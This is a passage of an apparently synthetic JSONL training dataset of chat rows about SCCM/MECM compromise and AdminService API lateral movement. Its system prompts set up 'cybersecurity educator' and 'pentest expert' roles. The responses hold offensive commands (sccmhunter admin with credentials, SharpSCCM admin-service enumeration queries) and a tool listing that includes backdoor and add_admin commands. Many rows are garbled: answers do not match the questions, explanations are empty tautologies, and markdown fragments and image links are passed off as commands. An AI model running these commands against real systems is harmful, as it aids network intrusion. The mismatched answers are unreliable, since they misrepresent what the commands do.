"assistant", "content": "This command is used for ldap search via ps. LDAP search via PS"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `![](<./assets/SCCM_Recon_ADSI.png>)`?", "response": "This command is used for ldap search via ps. LDAP search via PS", "metadata": {"corpus_index": 997, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of WMI"}, {"role": "assistant", "content": "Get-WmiObject -Class SMS_Authority -Namespace root\\CCM"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of WMI", "response": "Get-WmiObject -Class SMS_Authority -Namespace root\\CCM", "metadata": {"corpus_index": 998, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform WMI?"}, {"role": "assistant", "content": "Get-WmiObject -Class SMS_Authority -Namespace root\\CCM"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform WMI?", "response": "Get-WmiObject -Class SMS_Authority -Namespace root\\CCM", "metadata": {"corpus_index": 998, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What is SharmSCCP?"}, {"role": "assistant", "content": "SharpSCCM.exe local site-info\n```\n\n![](<./assets/SCCM_Recon_WMI-SharpSCCM.png>)\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What is SharmSCCP?", "response": "SharpSCCM.exe local site-info\n```\n\n![](<./assets/SCCM_Recon_WMI-SharpSCCM.png>)\n\n:::", "metadata": {"corpus_index": 999, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform SharmSCCP?"}, {"role": "assistant", "content": "SharpSCCM.exe local site-info\n```\n\n![](<./assets/SCCM_Recon_WMI-SharpSCCM.png>)\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform SharmSCCP?", "response": "SharpSCCM.exe local site-info\n```\n\n![](<./assets/SCCM_Recon_WMI-SharpSCCM.png>)\n\n:::", "metadata": {"corpus_index": 999, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe SCCM / MECM - Abuse in the context of penetration testing"}, {"role": "assistant", "content": "The different phases of an SCCM environment compromise are detailled in the following sections."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe SCCM / MECM - Abuse in the context of penetration testing", "response": "The different phases of an SCCM environment compromise are detailled in the following sections.", "metadata": {"corpus_index": 1000, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do SCCM / MECM - Abuse"}, {"role": "assistant", "content": "The different phases of an SCCM environment compromise are detailled in the following sections."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do SCCM / MECM - Abuse", "response": "The different phases of an SCCM environment compromise are detailled in the following sections.", "metadata": {"corpus_index": 1000, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe SCCM / MECM - Privilege Escalation in the context of penetration testing"}, {"role": "assistant", "content": "This page will describe how to compromise a SCCM infrastructure.\n\n> [!TIP]\n> Read the privilege-escalation section for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe SCCM / MECM - Privilege Escalation in the context of penetration testing", "response": "This page will describe how to compromise a SCCM infrastructure.\n\n> [!TIP]\n> Read the privilege-escalation section for more insight", "metadata": {"corpus_index": 1001, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute SCCM / MECM - Privilege Escalation?"}, {"role": "assistant", "content": "This page will describe how to compromise a SCCM infrastructure.\n\n> [!TIP]\n> Read the privilege-escalation section for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute SCCM / MECM - Privilege Escalation?", "response": "This page will describe how to compromise a SCCM infrastructure.\n\n> [!TIP]\n> Read the privilege-escalation section for more insight", "metadata": {"corpus_index": 1001, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of SCCM / MECM - Post-exploitation (i.e. lateral movement)"}, {"role": "assistant", "content": "After the SCCM infrastructure compromise, this page will describe how to pivot through the network with the help of the SCCM features.\n\n> [!TIP]\n> Read the lateral-movement section for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of SCCM / MECM - Post-exploitation (i.e. lateral movement)", "response": "After the SCCM infrastructure compromise, this page will describe how to pivot through the network with the help of the SCCM features.\n\n> [!TIP]\n> Read the lateral-movement section for more insight", "metadata": {"corpus_index": 1002, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on SCCM / MECM - Post-exploitation (i.e. lateral movement)"}, {"role": "assistant", "content": "After the SCCM infrastructure compromise, this page will describe how to pivot through the network with the help of the SCCM features.\n\n> [!TIP]\n> Read the lateral-movement section for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on SCCM / MECM - Post-exploitation (i.e. lateral movement)", "response": "After the SCCM infrastructure compromise, this page will describe how to pivot through the network with the help of the SCCM features.\n\n> [!TIP]\n> Read the lateral-movement section for more insight", "metadata": {"corpus_index": 1002, "category": "active_directory", "source_file": "docs/src/ad/movement/sccm-mecm/index.md", "page_title": "SCCM / MECM", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about AdminService API - Theory?"}, {"role": "assistant", "content": "It appears that, with SCCM administrative rights, it is possible to directly interact with the AdminService API, without using CMPivot, for post SCCM exploitation purpose.\n\n> [!CAUTION]\n> Prior to Configuration Manager version 2509, the AdminService API was vulnerable to NTLM relay attacks, allowing attackers to take over the SCCM hierarchy by relaying coerced NTLM authentication from site servers to remote SMS Providers. This vulnerability has been patched in version 2509, which now rejects NTLM authentication attempts. For more details, see TAKEOVER-5 and Microsoft's update notes.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to AdminService API abuse in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - RECON-4: CMPivot\n> - RECON-5: SMS Provider Enumeration\n> - CRED-7: AdminService API Credentials"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about AdminService API - Theory?", "response": "It appears that, with SCCM administrative rights, it is possible to directly interact with the AdminService API, without using CMPivot, for post SCCM exploitation purpose.\n\n> [!CAUTION]\n> Prior to Configuration Manager version 2509, the AdminService API was vulnerable to NTLM relay attacks, allowing attackers to take over the SCCM hierarchy by relaying coerced NTLM authentication from site servers to remote SMS Providers. This vulnerability has been patched in version 2509, which now rejects NTLM authentication attempts. For more details, see TAKEOVER-5 and Microsoft's update notes.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to AdminService API abuse in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - RECON-4: CMPivot\n> - RECON-5: SMS Provider Enumeration\n> - CRED-7: AdminService API Credentials", "metadata": {"corpus_index": 1003, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform AdminService API - Theory?"}, {"role": "assistant", "content": "It appears that, with SCCM administrative rights, it is possible to directly interact with the AdminService API, without using CMPivot, for post SCCM exploitation purpose.\n\n> [!CAUTION]\n> Prior to Configuration Manager version 2509, the AdminService API was vulnerable to NTLM relay attacks, allowing attackers to take over the SCCM hierarchy by relaying coerced NTLM authentication from site servers to remote SMS Providers. This vulnerability has been patched in version 2509, which now rejects NTLM authentication attempts. For more details, see TAKEOVER-5 and Microsoft's update notes.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to AdminService API abuse in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - RECON-4: CMPivot\n> - RECON-5: SMS Provider Enumeration\n> - CRED-7: AdminService API Credentials"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform AdminService API - Theory?", "response": "It appears that, with SCCM administrative rights, it is possible to directly interact with the AdminService API, without using CMPivot, for post SCCM exploitation purpose.\n\n> [!CAUTION]\n> Prior to Configuration Manager version 2509, the AdminService API was vulnerable to NTLM relay attacks, allowing attackers to take over the SCCM hierarchy by relaying coerced NTLM authentication from site servers to remote SMS Providers. This vulnerability has been patched in version 2509, which now rejects NTLM authentication attempts. For more details, see TAKEOVER-5 and Microsoft's update notes.\n\n> [!TIP]\n> For additional attack techniques and defense strategies related to AdminService API abuse in SCCM, refer to the following techniques from the Misconfiguration-Manager repository:\n> - RECON-4: CMPivot\n> - RECON-5: SMS Provider Enumeration\n> - CRED-7: AdminService API Credentials", "metadata": {"corpus_index": 1003, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about AdminService API - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, sccmhunter (Python) can be used for this purpose.\n\n``bash\nsccmhunter.py admin -u \"$USER\" -p \"$PASSWORD\" -ip \"site_server_IP\"\n`\n\nThen, the help command can be typed in the opened shell to view all the CMPivot commands handled by sccmhunter.\n\n`\n() C:\\ >> help\n\nDocumented commands (use 'help -v' for verbose/'help ' for details):\n\nDatabase Commands\n=================\nget_collection get_device get_lastlogon get_puser get_user\n\nInterface Commands\n==================\nexit interact\n\nPostEx Commands\n===============\nadd_admin backdoor backup delete_admin restore script\n\nSituational Awareness Commands\n==============================\nadministrators console_users ipconfig osinfo sessions\ncat disk list_disk ps shares \ncd environment ls services software\n`\n\n=== Windows\n\nFrom Windows systems, SharpSCCM (C#) can be used for this purpose.\n\nStep 1: retrieve the ID of the resource to enumerate (a computer or a computer collection)\n\n`powershell\nSharpSCCM.exe get resource-id -d \"COMPUTER\"\n`\n\n---\nStep 2: execute administrative tasks with CMPivot requests\n\n``powershell"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about AdminService API - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, sccmhunter (Python) can be used for this purpose.\n\n``bash\nsccmhunter.py admin -u \"$USER\" -p \"$PASSWORD\" -ip \"site_server_IP\"\n`\n\nThen, the help command can be typed in the opened shell to view all the CMPivot commands handled by sccmhunter.\n\n`\n() C:\\ >> help\n\nDocumented commands (use 'help -v' for verbose/'help ' for details):\n\nDatabase Commands\n=================\nget_collection get_device get_lastlogon get_puser get_user\n\nInterface Commands\n==================\nexit interact\n\nPostEx Commands\n===============\nadd_admin backdoor backup delete_admin restore script\n\nSituational Awareness Commands\n==============================\nadministrators console_users ipconfig osinfo sessions\ncat disk list_disk ps shares \ncd environment ls services software\n`\n\n=== Windows\n\nFrom Windows systems, SharpSCCM (C#) can be used for this purpose.\n\nStep 1: retrieve the ID of the resource to enumerate (a computer or a computer collection)\n\n`powershell\nSharpSCCM.exe get resource-id -d \"COMPUTER\"\n`\n\n---\nStep 2: execute administrative tasks with CMPivot requests\n\n``powershell", "metadata": {"corpus_index": 1004, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do AdminService API - Practice"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, sccmhunter (Python) can be used for this purpose.\n\n``bash\nsccmhunter.py admin -u \"$USER\" -p \"$PASSWORD\" -ip \"site_server_IP\"\n`\n\nThen, the help command can be typed in the opened shell to view all the CMPivot commands handled by sccmhunter.\n\n`\n() C:\\ >> help\n\nDocumented commands (use 'help -v' for verbose/'help ' for details):\n\nDatabase Commands\n=================\nget_collection get_device get_lastlogon get_puser get_user\n\nInterface Commands\n==================\nexit interact\n\nPostEx Commands\n===============\nadd_admin backdoor backup delete_admin restore script\n\nSituational Awareness Commands\n==============================\nadministrators console_users ipconfig osinfo sessions\ncat disk list_disk ps shares \ncd environment ls services software\n`\n\n=== Windows\n\nFrom Windows systems, SharpSCCM (C#) can be used for this purpose.\n\nStep 1: retrieve the ID of the resource to enumerate (a computer or a computer collection)\n\n`powershell\nSharpSCCM.exe get resource-id -d \"COMPUTER\"\n`\n\n---\nStep 2: execute administrative tasks with CMPivot requests\n\n``powershell"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do AdminService API - Practice", "response": "::: tabs\n\n=== UNIX-like\n\nFrom UNIX-like systems, sccmhunter (Python) can be used for this purpose.\n\n``bash\nsccmhunter.py admin -u \"$USER\" -p \"$PASSWORD\" -ip \"site_server_IP\"\n`\n\nThen, the help command can be typed in the opened shell to view all the CMPivot commands handled by sccmhunter.\n\n`\n() C:\\ >> help\n\nDocumented commands (use 'help -v' for verbose/'help ' for details):\n\nDatabase Commands\n=================\nget_collection get_device get_lastlogon get_puser get_user\n\nInterface Commands\n==================\nexit interact\n\nPostEx Commands\n===============\nadd_admin backdoor backup delete_admin restore script\n\nSituational Awareness Commands\n==============================\nadministrators console_users ipconfig osinfo sessions\ncat disk list_disk ps shares \ncd environment ls services software\n`\n\n=== Windows\n\nFrom Windows systems, SharpSCCM (C#) can be used for this purpose.\n\nStep 1: retrieve the ID of the resource to enumerate (a computer or a computer collection)\n\n`powershell\nSharpSCCM.exe get resource-id -d \"COMPUTER\"\n`\n\n---\nStep 2: execute administrative tasks with CMPivot requests\n\n``powershell", "metadata": {"corpus_index": 1004, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the sccmhunter.py syntax for adminservice api - practice?"}, {"role": "assistant", "content": "sccmhunter.py admin -u \"$USER\" -p \"$PASSWORD\" -ip \"site_server_IP\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the sccmhunter.py syntax for adminservice api - practice?", "response": "sccmhunter.py admin -u \"$USER\" -p \"$PASSWORD\" -ip \"site_server_IP\"", "metadata": {"corpus_index": 1005, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "sccmhunter.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out AdminService API - Practice during a pentest?"}, {"role": "assistant", "content": "sccmhunter.py admin -u \"$USER\" -p \"$PASSWORD\" -ip \"site_server_IP\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out AdminService API - Practice during a pentest?", "response": "sccmhunter.py admin -u \"$USER\" -p \"$PASSWORD\" -ip \"site_server_IP\"", "metadata": {"corpus_index": 1005, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `sccmhunter.py admin -u \"$USER\" -p \"$PASSWORD\" -ip \"site_server_IP\"`?"}, {"role": "assistant", "content": "This command is used for adminservice api - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `sccmhunter.py admin -u \"$USER\" -p \"$PASSWORD\" -ip \"site_server_IP\"`?", "response": "This command is used for adminservice api - practice. Practice", "metadata": {"corpus_index": 1005, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute AdminService API - Practice?"}, {"role": "assistant", "content": "() C:\\ >> help\n\nDocumented commands (use 'help -v' for verbose/'help ' for details):\n\nDatabase Commands\n=================\nget_collection get_device get_lastlogon get_puser get_user\n\nInterface Commands\n==================\nexit interact\n\nPostEx Commands\n===============\nadd_admin backdoor backup delete_admin restore script\n\nSituational Awareness Commands\n==============================\nadministrators console_users ipconfig osinfo sessions\ncat disk list_disk ps shares \ncd environment ls services software"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute AdminService API - Practice?", "response": "() C:\\ >> help\n\nDocumented commands (use 'help -v' for verbose/'help ' for details):\n\nDatabase Commands\n=================\nget_collection get_device get_lastlogon get_puser get_user\n\nInterface Commands\n==================\nexit interact\n\nPostEx Commands\n===============\nadd_admin backdoor backup delete_admin restore script\n\nSituational Awareness Commands\n==============================\nadministrators console_users ipconfig osinfo sessions\ncat disk list_disk ps shares \ncd environment ls services software", "metadata": {"corpus_index": 1006, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `() C:\\ >> help`?"}, {"role": "assistant", "content": "This command is used for adminservice api - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `() C:\\ >> help`?", "response": "This command is used for adminservice api - practice. Practice", "metadata": {"corpus_index": 1006, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the SharpSCCM.exe command to adminservice api - practice"}, {"role": "assistant", "content": "SharpSCCM.exe get resource-id -d \"COMPUTER\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the SharpSCCM.exe command to adminservice api - practice", "response": "SharpSCCM.exe get resource-id -d \"COMPUTER\"", "metadata": {"corpus_index": 1007, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "SharpSCCM.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do AdminService API - Practice"}, {"role": "assistant", "content": "SharpSCCM.exe get resource-id -d \"COMPUTER\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do AdminService API - Practice", "response": "SharpSCCM.exe get resource-id -d \"COMPUTER\"", "metadata": {"corpus_index": 1007, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `SharpSCCM.exe get resource-id -d \"COMPUTER\"`?"}, {"role": "assistant", "content": "This command is used for adminservice api - practice. Practice"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `SharpSCCM.exe get resource-id -d \"COMPUTER\"`?", "response": "This command is used for adminservice api - practice. Practice", "metadata": {"corpus_index": 1007, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Enumerate the local administrators"}, {"role": "assistant", "content": "SharpSCCM.exe invoke admin-service -r $RESOURCE_ID -q \"Administrators\" -j"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Enumerate the local administrators", "response": "SharpSCCM.exe invoke admin-service -r $RESOURCE_ID -q \"Administrators\" -j", "metadata": {"corpus_index": 1008, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through Enumerate the local administrators"}, {"role": "assistant", "content": "SharpSCCM.exe invoke admin-service -r $RESOURCE_ID -q \"Administrators\" -j"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through Enumerate the local administrators", "response": "SharpSCCM.exe invoke admin-service -r $RESOURCE_ID -q \"Administrators\" -j", "metadata": {"corpus_index": 1008, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Describe Enumerate the installed softwares in the context of penetration testing"}, {"role": "assistant", "content": "SharpSCCM.exe invoke admin-service -r $RESOURCE_ID -q \"InstalledSoftware\" -j\n```\n\nInstructions about how to write CMPivot queries are presented here.\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Describe Enumerate the installed softwares in the context of penetration testing", "response": "SharpSCCM.exe invoke admin-service -r $RESOURCE_ID -q \"InstalledSoftware\" -j\n```\n\nInstructions about how to write CMPivot queries are presented here.\n\n:::", "metadata": {"corpus_index": 1009, "category": "linux", "source_file": "docs/src/ad/movement/sccm-mecm/lateral-movement/adminservice-api.md", "page_title": "AdminService API", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform Enumerate the installed softwares?"}, {"role": "assistant", "content": "SharpSCCM.exe invoke admin-service -r $RESOURCE_ID -q \"InstalledSoftware\" -j\n```\n\nInstructions about how to write CMPivot queries are presented here.\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform Enumerate the installed softwares?", "response": "SharpSCCM.exe invoke admin-service -r $RESOURCE_ID -q \"InstalledSoftware\" -j\n```\n\nInstructions about how to write CMPivot queries are presented here.\n\n:::", "metadata": {"corpus_index": 1009, "category": "linux", "source_file": 